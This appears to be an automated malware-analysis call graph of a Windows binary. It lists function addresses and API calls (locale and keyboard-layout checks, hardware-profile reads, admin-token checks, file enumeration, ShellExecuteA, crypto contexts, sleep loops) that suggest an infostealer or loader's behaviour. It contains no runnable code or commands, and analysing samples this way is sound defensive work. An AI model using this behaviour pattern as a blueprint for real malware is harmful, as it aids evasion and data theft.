34285->34287 34286->34280 34286->34284 34286->34285 34288 408f33 34287->34288 34290 401960 27 API calls 34288->34290 34289->34280 34296 408f52 34290->34296 34291 4093d0 39 API calls 34291->34296 34292 402510 27 API calls 34292->34296 34293 40c930 27 API calls 34293->34296 34294 402440 25 API calls 34294->34296 34295 408fe3 Sleep 34295->34296 34296->34291 34296->34292 34296->34293 34296->34294 34296->34295 34297 402410 27 API calls 34296->34297 34298 408fef 34296->34298 34297->34296 34299 401960 27 API calls 34298->34299 34310 409004 34299->34310 34300 409460 39 API calls 34300->34310 34301 402510 27 API calls 34301->34310 34302 40c930 27 API calls 34302->34310 34303 402440 25 API calls 34303->34310 34304 409138 34305 4054c0 47 API calls 34304->34305 34307 4091db 34305->34307 34306 4162ee 15 API calls _Yarn 34306->34310 34308 40bb90 69 API calls 34308->34310 34309 403770 51 API calls 34309->34310 34310->34300 34310->34301 34310->34302 34310->34303 34310->34304 34310->34306 34310->34308 34310->34309 34311 402b60 96 API calls 34310->34311 34312 40913d 34310->34312 34311->34310 34313 4091b2 Sleep 34312->34313 34314 4091cf Sleep 34312->34314 34315 10002450 86 API calls 34312->34315 34313->34304 34313->34312 34314->34304 34315->34312 34316->34115 34317->34123 34319->34052 34320->34065 34322 402533 34321->34322 34322->34322 34323 4026b0 27 API calls 34322->34323 34324 402545 34323->34324 34325 40b4e0 99 API calls 34324->34325 34325->34086 34327 40244b 34326->34327 34328 402466 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 34326->34328 34327->34328 34329 413527 25 API calls 34327->34329 34328->34094 34331 40248a 34329->34331 34330 4024c1 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 34330->34094 34331->34330 34332 413527 25 API calls 34331->34332 34333 40250c 34332->34333 36526 405420 OpenProcess 34334->36526 34342 40553b 34343 40ca40 27 API calls 34342->34343 34344 40554a 34343->34344 34345 40c880 27 API calls 34344->34345 34346 40555d 34345->34346 34347 402440 25 API calls 34346->34347 34348 405568 34347->34348 34349 402440 25 API calls 34348->34349 34350 405570 34349->34350 34351 402440 25 API calls 34350->34351 34352 405578 34351->34352 34353 402440 25 API calls 34352->34353 34354 405583 34353->34354 34355 402440 25 API calls 34354->34355 34356 40558e 34355->34356 34357 40559a ShellExecuteA 34356->34357 34358 417cad 24 API calls 34357->34358 34359 4055b1 34358->34359 34360->34077 34361->34093 34362->34066 34364 41cb80 34363->34364 34365 41cb7a 34363->34365 34369 41cb86 SetLastError 34364->34369 34394 41e7df 6 API calls std::_Locinfo::_Locinfo_dtor 34364->34394 34393 41e7a0 6 API calls std::_Locinfo::_Locinfo_dtor 34365->34393 34368 41cb9e 34368->34369 34370 41cba2 34368->34370 34376 40974b 34369->34376 34377 41cc1a 34369->34377 34395 41e25b 14 API calls 2 library calls 34370->34395 34372 41cbae 34374 41cbb6 34372->34374 34375 41cbcd 34372->34375 34396 41e7df 6 API calls std::_Locinfo::_Locinfo_dtor 34374->34396 34398 41e7df 6 API calls std::_Locinfo::_Locinfo_dtor 34375->34398 34376->34036 34402 419c49 38 API calls __InternalCxxFrameHandler 34377->34402 34382 41cbd9 34383 41cbdd 34382->34383 34384 41cbee 34382->34384 34399 41e7df 6 API calls std::_Locinfo::_Locinfo_dtor 34383->34399 34400 41c991 14 API calls _free 34384->34400 34388 41cbca 34388->34369 34389 41cbc4 34397 41e2b8 14 API calls _free 34389->34397 34390 41cbf9 34401 41e2b8 14 API calls _free 34390->34401 34392 41cc00 34392->34369 34393->34364 34394->34368 34395->34372 34396->34389 34397->34388 34398->34382 34399->34389 34400->34390 34401->34392 34404 404381 34403->34404 34405 404379 34403->34405 34404->34156 34407 404390 34405->34407 34445 41044b RaiseException 34405->34445 34446 41044b RaiseException 34407->34446 34409 4043cf 34447 40ff71 26 API calls 3 library calls 34409->34447 34411 4043f4 34411->34156 34413 40e292 std::locale::_Init 34412->34413 34448 40e0a3 34413->34448 34418 40e2b0 34462 40e40e 40 API calls std::locale::_Setgloballocale 34418->34462 34419 40e30e std::locale::_Init 34419->34160 34421 40e2b8 34463 40e1de 15 API calls 2 library calls 34421->34463 34423 40e2ce 34454 40e0fb 34423->34454 34425 40e0a3 std::_Lockit::_Lockit 7 API calls 34424->34425 34426 40c5de 34425->34426 34427 40e0a3 std::_Lockit::_Lockit 7 API calls 34426->34427 34429 40c620 34426->34429 34428 40c600 34427->34428 34431 40e0fb std::_Lockit::~_Lockit 2 API calls 34428->34431 34434 40edcf std::_Facet_Register 27 API calls 34429->34434 34444 40c665 34429->34444 34430 40e0fb std::_Lockit::~_Lockit 2 API calls 34432 40c6ed 34430->34432 34431->34429 34433 40ebbf __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 34432->34433 34435 40c4cb 34433->34435 34436 40c670 34434->34436 34435->34162 34435->34164 34468 403f10 68 API calls 2 library calls 34436->34468 34438 40c6a0 34469 40e67f 39 API calls __Getctype 34438->34469 34440 40c6b6 34470 403fc0 66 API calls 3 library calls 34440->34470 34442 40c6c8 34471 40e254 27 API calls std::_Facet_Register 34442->34471 34444->34430 34445->34407 34446->34409 34447->34411 34449 40e0b2 34448->34449 34450 40e0b9 34448->34450 34464 418c10 6 API calls 2 library calls 34449->34464 34452 40e0b7 34450->34452 34465 40e909 EnterCriticalSection 34450->34465 34452->34423 34461 40e3eb 27 API calls 2 library calls 34452->34461 34455 40e105 34454->34455 34456 418c1e 34454->34456 34457 40e118 34455->34457 34466 40e917 LeaveCriticalSection 34455->34466 34467 418bf9 LeaveCriticalSection 34456->34467 34457->34419 34460 418c25 34460->34419 34461->34418 34462->34421 34463->34423 34464->34452 34465->34452 34466->34457 34467->34460 34468->34438 34469->34440 34470->34442 34471->34444 34472->34181 34473->34185 34475 405eb1 34474->34475 34477 405ede _Yarn 34475->34477 34858 4027f0 27 API calls 34475->34858 34477->34195 34480 4048a8 34479->34480 34483 4048ea 34479->34483 34949 40ef48 6 API calls 34480->34949 34482 4048b2 34482->34483 34950 40f25b 28 API calls 34482->34950 34485 4026b0 27 API calls 34483->34485 34487 404947 34485->34487 34486 4048dd 34951 40eefe EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 34486->34951 34859 418b65 34487->34859 34490 40495f 34490->34490 34491 4026b0 27 API calls 34490->34491 34492 404995 34491->34492 34493 4049c3 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 34492->34493 34494 404d2a 34492->34494 34496 4049f5 _Yarn 34493->34496 34952 402980 27 API calls 4 library calls 34493->34952 34497 413527 25 API calls 34494->34497 34503 404a88 34496->34503 34953 40ef48 6 API calls 34496->34953 34498 404d2f 34497->34498 34500 413527 25 API calls 34498->34500 34502 404d34 34500->34502 34501 404a50 34501->34503 34954 40f25b 28 API calls 34501->34954 34505 4026b0 27 API calls 34503->34505 34507 404b0a 34505->34507 34506 404a7b 34955 40eefe EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 34506->34955 34872 404490 34507->34872 34510 404b12 34513 404b6f 34510->34513 34956 40ef48 6 API calls 34510->34956 34512 404b36 34512->34513 34957 40f25b 28 API calls 34512->34957 34515 4026b0 27 API calls 34513->34515 34517 404bd6 34515->34517 34516 404b62 34958 40eefe EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 34516->34958 34519 404490 87 API calls 34517->34519 34520 404bde 34519->34520 34523 404c3f 34520->34523 34959 40ef48 6 API calls 34520->34959 34522 404c04 34522->34523 34960 40f25b 28 API calls 34522->34960 34525 4026b0 27 API calls 34523->34525 34527 404cb6 34525->34527 34526 404c32 34961 40eefe EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 34526->34961 34529 404490 87 API calls 34527->34529 34531 404cbe 34529->34531 34530 404d00 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 34532 40ebbf __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 34530->34532 34531->34498 34531->34530 34533 404d23 34532->34533 34534 404f20 34533->34534 34983 404d40 GetKeyboardLayoutList 34534->34983 34536 4051de std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 34538 40ebbf __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 34536->34538 34537 40bb90 69 API calls 34551 404f63 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 34537->34551 34540 405240 34538->34540 34553 402410 34540->34553 34541 40519a 34541->34536 34543 405244 34541->34543 34544 413527 25 API calls 34543->34544 34546 405249 34544->34546 34545 4026b0 27 API calls 34545->34551 34548 413527 25 API calls 34546->34548 34549 40524e 34548->34549 34551->34537 34551->34545 34551->34546 34552 405182 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 34551->34552 35012 40ef48 6 API calls 34551->35012 35013 40f25b 28 API calls 34551->35013 35014 40eefe EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 34551->35014 34552->34536 34552->34546 35015 40d380 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 34552->35015 34554 402420 34553->34554 34554->34554 34555 4026b0 27 API calls 34554->34555 34556 402432 34555->34556 34557 406aa0 34556->34557 35021 4065e0 GetCurrentProcess OpenProcessToken 34557->35021 34559 406b20 34560 407e48 34559->34560 34561 406b28 SHGetFolderPathA 34559->34561 34562 406760 41 API calls 34560->34562 34563 406b63 34561->34563 34568 406b41 34561->34568 34564 407e53 34562->34564 34565 418b65 42 API calls 34563->34565 34566 417df6 38 API calls 34564->34566 34565->34568 34567 407e5c 34566->34567 34570 4055c0 40 API calls 34567->34570 34569 4026b0 27 API calls 34568->34569 34571 406b8d 34569->34571 34572 407e72 34570->34572 35031 406760 GetCurrentHwProfileA 34571->35031 34578 407ed8 34572->34578 35605 40ef48 6 API calls 34572->35605 34574 406b98 34576 417df6 38 API calls 34574->34576 34579 406ba1 34576->34579 34577 407e9c 34577->34578 35606 40f25b 28 API calls 34577->35606 34580 4026b0 27 API calls 34578->34580 35044 4055c0 34579->35044 34583 407f4b 34580->34583 34586 407f64 34583->34586 35608 402980 27 API calls 4 library calls 34583->35608 34585 407ecb 35607 40eefe EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 34585->35607 34591 40c990 27 API calls 34586->34591 34590 406bcd 35065 40c990 34590->35065 34593 40800e 34591->34593 34595 402490 25 API calls 34593->34595 34594 406be8 35069 402490 34594->35069 34608 40801d std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 34595->34608 34597 406c80 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 34601 40bb90 69 API calls 34597->34601 34598 408cea 34604 413527 25 API calls 34598->34604 34599 408ce5 34603 413527 25 API calls 34599->34603 34600 406bf7 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 34600->34597 34600->34599 34605 406ca1 34601->34605 34602 40bb90 69 API calls 34606 408120 34602->34606 34603->34598 34607 408cef 34604->34607 34609 40bb90 69 API calls 34605->34609 34610 40bb90 69 API calls 34606->34610 34611 413527 25 API calls 34607->34611 34608->34598 34608->34602 34612 406cb6 34609->34612 34613 408135 34610->34613 34614 408cf4 34611->34614 35074 406800 CreateDirectoryA 34612->35074 34617 406800 270 API calls 34613->34617 35386 405f40 34614->35386 34616 406cbf 34618 406cca 34616->34618 34619 406f0f 34616->34619 34620 40813e 34617->34620 34622 40c770 27 API calls 34618->34622 34635 406f71 34619->34635 35590 40ef48 6 API calls 34619->35590 34625 40c770 27 API calls 34620->34625 34695 40818e std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 34620->34695 34624 406cdc 34622->34624 34630 40c990 27 API calls 34624->34630 34631 40815b 34625->34631 34627 408d44 34628 408d6a 34627->34628 34638 417df6 38 API calls 34627->34638 35443 401960 34628->35443 34636 406cf7 34630->34636 34637 40c990 27 API calls 34631->34637 34632 406f35 34632->34635 35591 40f25b 28 API calls 34632->35591 34634 408d7d 35447 409340 34634->35447 34640 4026b0 27 API calls 34635->34640 34825 406d0f std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 34636->34825 35589 402980 27 API calls 4 library calls 34636->35589 34641 408176 34637->34641 34643 408d55 Sleep 34638->34643 34647 406fea 34640->34647 34641->34695 35609 402980 27 API calls 4 library calls 34641->35609 34645 405f40 47 API calls 34643->34645 34645->34627 34646 408d86 34656 402510 27 API calls 34646->34656 34651 407003 34647->34651 35593 402980 27 API calls 4 library calls 34647->35593 34649 4026b0 27 API calls 34649->34695 34650 406f64 35592 40eefe EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 34650->35592 34657 40c990 27 API calls 34651->34657 34659 408d99 34656->34659 34660 4070ad 34657->34660 34658 40c990 27 API calls 34658->34695 35457 409290 34659->35457 34662 402490 25 API calls 34660->34662 34670 4070bc std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 34662->34670 34663 402490 25 API calls 34663->34695 34664 408da4 34667 402510 27 API calls 34664->34667 34665 40ebbf __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 34666 408cde 34665->34666 34666->34208 34668 408db7 34667->34668 35467 4091e0 34668->35467 34669 40bb90 69 API calls 34672 4071bf 34669->34672 34670->34607 34670->34669 34674 40bb90 69 API calls 34672->34674 34673 408dc2 34678 402510 27 API calls 34673->34678 34675 4071d4 34674->34675 34677 406800 270 API calls 34675->34677 34676 40bb90 69 API calls 34676->34695 34679 4071dd 34677->34679 34681 408dd5 34678->34681 34682 4073d8 34679->34682 34683 4071e8 34679->34683 34680 406800 270 API calls 34680->34695 35477 40c930 34681->35477 34697 407473 34682->34697 35595 40ef48 6 API calls 34682->35595 34685 40c770 27 API calls 34683->34685 34688 4071fa 34685->34688 34686 408878 34701 4088dd 34686->34701 35613 40ef48 6 API calls 34686->35613 34693 40c990 27 API calls 34688->34693 34690 40c770 27 API calls 34690->34695 34692 40c990 27 API calls 34698 408e02 34692->34698 34699 407215 34693->34699 34694 40741d 34694->34697 35596 40f25b 28 API calls 34694->35596 34695->34598 34695->34649 34695->34658 34695->34663 34695->34676 34695->34680 34695->34686 34695->34690 34711 402980 27 API calls 34695->34711 34695->34825 35610 40ef48 6 API calls 34695->35610 35611 40f25b 28 API calls 34695->35611 35612 40eefe EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 34695->35612 34696 4088a3 34696->34701 35614 40f25b 28 API calls 34696->35614 34700 4026b0 27 API calls 34697->34700 35481 40ca40 34698->35481 34699->34825 35594 402980 27 API calls 4 library calls 34699->35594 34706 4074da 34700->34706 34707 4026b0 27 API calls 34701->34707 34713 4074f3 34706->34713 35598 402980 27 API calls 4 library calls 34706->35598 34714 40896a 34707->34714 34709 407466 35597 40eefe EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 34709->35597 34711->34695 34712 4088d0 35615 40eefe EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 34712->35615 34720 40c990 27 API calls 34713->34720 34718 408983 34714->34718 35616 402980 27 API calls 4 library calls 34714->35616 34715 40ca40 27 API calls 34719 408e2c 34715->34719 34725 40c990 27 API calls 34718->34725 34722 40c990 27 API calls 34719->34722 34724 40759d 34720->34724 34723 408e42 34722->34723 34726 402440 25 API calls 34723->34726 34727 402490 25 API calls 34724->34727 34728 408a2d 34725->34728 34729 408e50 34726->34729 34737 4075ac std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 34727->34737 34730 402490 25 API calls 34728->34730 34731 402440 25 API calls 34729->34731 34740 408a3c std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 34730->34740 34733 408e5b 34731->34733 34732 406f0a std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 34732->34665 34734 402440 25 API calls 34733->34734 34736 408e66 34734->34736 34735 40bb90 69 API calls 34738 4076af 34735->34738 34739 402440 25 API calls 34736->34739 34737->34598 34737->34735 34742 40bb90 69 API calls 34738->34742 34743 408e71 34739->34743 34740->34598 34741 40bb90 69 API calls 34740->34741 34744 408b3f 34741->34744 34745 4076c4 34742->34745 34746 402440 25 API calls 34743->34746 34747 40bb90 69 API calls 34744->34747 34748 406800 270 API calls 34745->34748 34749 408e7c 34746->34749 34750 408b54 34747->34750 34751 4076cd 34748->34751 34752 402440 25 API calls 34749->34752 34753 406800 270 API calls 34750->34753 34754 4078c8 34751->34754 34755 4076d8 34751->34755 34756 408e87 34752->34756 34757 408b5d 34753->34757 34773 40792d 34754->34773 35600 40ef48 6 API calls 34754->35600 34758 40c770 27 API calls 34755->34758 34759 402440 25 API calls 34756->34759 34760 408c94 34757->34760 34761 408b68 34757->34761 34762 4076ea 34758->34762 34803 408e96 34759->34803 34763 402440 25 API calls 34760->34763 34765 40c770 27 API calls 34761->34765 34766 40c990 27 API calls 34762->34766 34767 408c9f 34763->34767 34769 408b7a 34765->34769 34770 407705 34766->34770 34771 402440 25 API calls 34767->34771 34820 407e39 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 34767->34820 34768 4078f3 34768->34773 35601 40f25b 28 API calls 34768->35601 34772 40c990 27 API calls 34769->34772 34770->34825 35599 402980 27 API calls 4 library calls 34770->35599 34771->34820 34776 408b95 34772->34776 34777 4026b0 27 API calls 34773->34777 34774 402510 27 API calls 34778 408c92 34774->34778 34791 408bad 34776->34791 35617 402980 27 API calls 4 library calls 34776->35617 34781 4079ba 34777->34781 34782 402440 25 API calls 34778->34782 34779 407920 35602 40eefe EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 34779->35602 34784 4079d3 34781->34784 35603 402980 27 API calls 4 library calls 34781->35603 34782->34732 34790 40c990 27 API calls 34784->34790 34786 408eef 34788 408f18 Sleep 34786->34788 34793 417df6 38 API calls 34786->34793 34811 402440 25 API calls 34786->34811 34788->34803 34789 408c4c std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 34794 402440 25 API calls 34789->34794 34792 407a7d 34790->34792 34791->34598 34791->34789 34795 402490 25 API calls 34792->34795 34796 408f04 Sleep 34793->34796 34797 408c7c 34794->34797 34807 407a8c std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 34795->34807 34796->34803 34799 402440 25 API calls 34797->34799 34798 402510 27 API calls 34798->34803 34800 408c87 34799->34800 34801 402440 25 API calls 34800->34801 34801->34778 34802 408f2b 34804 402440 25 API calls 34802->34804 34803->34786 34803->34798 34803->34802 34806 408f33 34804->34806 34805 40bb90 69 API calls 34808 407b8f 34805->34808 34812 401960 27 API calls 34806->34812 34807->34598 34807->34805 34809 40bb90 69 API calls 34808->34809 34810 407ba4 34809->34810 34813 406800 270 API calls 34810->34813 34811->34786 34829 408f52 34812->34829 34814 407bad 34813->34814 34815 407bb8 34814->34815 34819 407da8 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 34814->34819 34817 40c770 27 API calls 34815->34817 34818 407bca 34817->34818 34821 40c990 27 API calls 34818->34821 34819->34598 34819->34820 34820->34774 34822 407be5 34821->34822 34822->34825 35604 402980 27 API calls 4 library calls 34822->35604 34823 402510 27 API calls 34823->34829 34825->34598 34825->34732 34826 40c930 27 API calls 34826->34829 34827 402440 25 API calls 34827->34829 34828 408fe3 Sleep 34828->34829 34829->34823 34829->34826 34829->34827 34829->34828 34830 402410 27 API calls 34829->34830 34831 408fef 34829->34831 35484 4093d0 34829->35484 34830->34829 34832 401960 27 API calls 34831->34832 34843 409004 34832->34843 34834 402510 27 API calls 34834->34843 34835 40c930 27 API calls 34835->34843 34836 402440 25 API calls 34836->34843 34837 409138 34838 4054c0 47 API calls 34837->34838 34839 4091db 34838->34839 34840 4162ee 15 API calls _Yarn 34840->34843 34841 40bb90 69 API calls 34841->34843 34843->34834 34843->34835 34843->34836 34843->34837 34843->34840 34843->34841 34845 40913d 34843->34845 35494 409460 34843->35494 35504 403770 CryptAcquireContextW 34843->35504 35530 402b60 34843->35530 34846 4091b2 Sleep 34845->34846 34847 4091cf Sleep 34845->34847 35539 10002450 34845->35539 34846->34837 34846->34845 34847->34837 34850 40671f 34849->34850 34851 40673d std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 34849->34851 34850->34851 34853 406758 34850->34853 34852 40ebbf __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 34851->34852 34854 406754 34852->34854 34855 413527 25 API calls 34853->34855 34854->34218 34856 40675d 34855->34856 34857->34198 34860 418a79 CallCatchBlock 34859->34860 34861 418a8c 34860->34861 34865 418ab2 34860->34865 34962 4135f1 14 API calls _free 34861->34962 34863 418a91 34963 413517 25 API calls ___std_exception_copy 34863->34963 34964 418bb1 EnterCriticalSection 34865->34964 34866 418a9c 34866->34490 34868 418abd 34965 418af8 42 API calls __strnicoll 34868->34965 34870 418ac8 34966 418aef LeaveCriticalSection std::_Lockit::~_Lockit 34870->34966 34873 40bb90 69 API calls 34872->34873 34874 404509 34873->34874 34875 40451c 34874->34875 34967 402980 27 API calls 4 library calls 34874->34967 34876 40455a FindFirstFileA 34875->34876 34894 40465b std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 34876->34894 34895 40457e std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 34876->34895 34878 40bb90 69 API calls 34878->34894 34879 4026b0 27 API calls 34879->34895 34881 4047c5 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 34884 40ebbf __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 34881->34884 34882 404827 34885 413527 25 API calls 34882->34885 34883 404740 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 34883->34881 34883->34882 34886 404820 34884->34886 34887 40482c 34885->34887 34886->34510 34890 413527 25 API calls 34887->34890 34889 404642 FindNextFileA 34892 404654 FindClose 34889->34892 34889->34895 34893 404831 34890->34893 34891 4046e8 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 34891->34882 34891->34883 34891->34887 34969 40d3f0 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 34891->34969 34892->34894 34898 4048ea 34893->34898 34970 40ef48 6 API calls 34893->34970 34894->34878 34894->34887 34894->34891 34895->34879 34895->34882 34895->34889 34968 40ce50 27 API calls 3 library calls 34895->34968 34897 4048b2 34897->34898 34971 40f25b 28 API calls 34897->34971 34900 4026b0 27 API calls 34898->34900 34902 404947 34900->34902 34901 4048dd 34972 40eefe EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 34901->34972 34904 418b65 42 API calls 34902->34904 34905 40495f 34904->34905 34906 4026b0 27 API calls 34905->34906 34907 404995 34906->34907 34908 4049c3 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 34907->34908 34909 404d2a 34907->34909 34911 4049f5 _Yarn 34908->34911 34973 402980 27 API calls 4 library calls 34908->34973 34912 413527 25 API calls 34909->34912 34918 404a88 34911->34918 34974 40ef48 6 API calls 34911->34974 34913 404d2f 34912->34913 34915 413527 25 API calls 34913->34915 34917 404d34 34915->34917 34916 404a50 34916->34918 34975 40f25b 28 API calls 34916->34975 34920 4026b0 27 API calls 34918->34920 34922 404b0a 34920->34922 34921 404a7b 34976 40eefe EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 34921->34976 34924 404490 84 API calls 34922->34924 34925 404b12 34924->34925 34928 404b6f 34925->34928 34977 40ef48 6 API calls 34925->34977 34927 404b36 34927->34928 34978 40f25b 28 API calls 34927->34978 34930 4026b0 27 API calls 34928->34930 34932 404bd6 34930->34932 34931 404b62 34979 40eefe EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 34931->34979 34934 404490 84 API calls 34932->34934 34935 404bde 34934->34935 34938 404c3f 34935->34938 34980 40ef48 6 API calls 34935->34980 34937 404c04 34937->34938 34981 40f25b 28 API calls 34937->34981 34940 4026b0 27 API calls 34938->34940 34942 404cb6 34940->34942 34941 404c32 34982 40eefe EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 34941->34982 34944 404490 84 API calls 34942->34944 34946 404cbe 34944->34946 34945 404d00 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 34947 40ebbf __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 34945->34947 34946->34913 34946->34945 34948 404d23 34947->34948 34948->34510 34949->34482 34950->34486 34951->34483 34952->34496 34953->34501 34954->34506 34955->34503 34956->34512 34957->34516 34958->34513 34959->34522 34960->34526 34961->34523 34962->34863 34963->34866 34964->34868 34965->34870 34966->34866 34967->34876 34968->34895 34969->34883 34970->34897 34971->34901 34972->34898 34973->34911 34974->34916 34975->34921 34976->34918 34977->34927 34978->34931 34979->34928 34980->34937 34981->34941 34982->34938 34984 404efa 34983->34984 34990 404dee std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 34983->34990 34986 40ebbf __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 34984->34986 34985 404df0 GetLocaleInfoA 34985->34990 34987 404f13 34986->34987 34987->34551 34988 4026b0 27 API calls 34988->34990 34990->34984 34990->34985 34990->34988 34991 404f1a 34990->34991 35016 40cc40 27 API calls 3 library calls 34990->35016 34992 413527 25 API calls 34991->34992 34993 404f1f 34992->34993 34994 404d40 82 API calls 34993->34994 35010 404f63 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 34994->35010 34995 40bb90 69 API calls 34995->35010 34996 40ebbf __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 34998 405240 34996->34998 34998->34551 34999 40519a 35001 405244 34999->35001 35002 4051de std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 34999->35002 35003 413527 25 API calls 35001->35003 35002->34996 35005 405249 35003->35005 35004 4026b0 27 API calls 35004->35010 35007 413527 25 API calls 35005->35007 35008 40524e 35007->35008 35010->34995 35010->35004 35010->35005 35011 405182 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 35010->35011 35017 40ef48 6 API calls 35010->35017 35018 40f25b 28 API calls 35010->35018 35019 40eefe EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 35010->35019 35011->35002 35011->35005 35020 40d380 25 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 35011->35020 35012->34551 35013->34551 35014->34551 35015->34541 35016->34990 35017->35010 35018->35010 35019->35010 35020->34999 35022 406614 GetTokenInformation 35021->35022 35023 406636 35021->35023 35024 406630 CloseHandle 35022->35024 35025 406646 CloseHandle AllocateAndInitializeSid 35022->35025 35026 40ebbf __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 35023->35026 35024->35023 35025->35023 35028 406670 EqualSid FreeSid 35025->35028 35027 406642 35026->35027 35027->34559 35029 40ebbf __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 35028->35029 35030 406695 35029->35030 35030->34559 35032 406790 35031->35032 35033 4067d6 35031->35033 35037 4026b0 27 API calls 35032->35037 35034 417df6 38 API calls 35033->35034 35035 4067db 35034->35035 35036 4055c0 40 API calls 35035->35036 35038 4067ed 35036->35038 35039 4067c5 35037->35039 35040 40ebbf __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 35038->35040 35041 40ebbf __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 35039->35041 35042 4067fa 35040->35042 35043 4067d2 35041->35043 35042->34574 35043->34574 35618 40b9d0 35044->35618 35046 405624 35047 405681 35046->35047 35048 417df6 38 API calls 35046->35048 35632 40d240 27 API calls 4 library calls 35046->35632 35050 40c770 35047->35050 35048->35046 35051 40c869 35050->35051 35055 40c79a 35050->35055 35635 401950 27 API calls 35051->35635 35053 40c812 _Yarn 35053->34590 35054 40c86e 35636 4018b0 27 API calls 2 library calls 35054->35636 35055->35053 35058 40c820 35055->35058 35059 40c7fe 35055->35059 35057 40c80b 35057->35053 35060 413527 25 API calls 35057->35060 35058->35053 35063 40edcf std::_Facet_Register 27 API calls 35058->35063 35059->35054 35061 40c805 35059->35061 35062 40c878 35060->35062 35064 40edcf std::_Facet_Register 27 API calls 35061->35064 35063->35053 35064->35057 35066 40c9a9 35065->35066 35067 40c9bd _Yarn 35066->35067 35637 402980 27 API calls 4 library calls 35066->35637 35067->34594 35070 4024c1 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 35069->35070 35071 40249e 35069->35071 35070->34600 35071->35070 35072 413527 25 API calls 35071->35072 35073 40250c 35072->35073 35075 406859 GetLastError 35074->35075 35076 40686a 35074->35076 35075->35076 35082 4069ff std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 35075->35082 35077 40c770 27 API calls 35076->35077 35078 406876 35077->35078 35079 40c990 27 API calls 35078->35079 35080 406888 35079->35080 35086 4068a0 35080->35086 35664 402980 27 API calls 4 library calls 35080->35664 35081 406a74 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 35081->34616 35082->35081 35083 413527 25 API calls 35082->35083 35085 406a9e 35083->35085 35088 4065e0 13 API calls 35085->35088 35638 413d5d 35086->35638 35089 406b20 35088->35089 35090 407e48 35089->35090 35091 406b28 SHGetFolderPathA 35089->35091 35092 406760 41 API calls 35090->35092 35094 406b63 35091->35094 35103 406b41 35091->35103 35097 407e53 35092->35097 35093 4069c7 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 35093->35082 35641 418608 35093->35641 35099 418b65 42 API calls 35094->35099 35095 406a94 35096 413527 25 API calls 35095->35096 35096->35082 35100 417df6 38 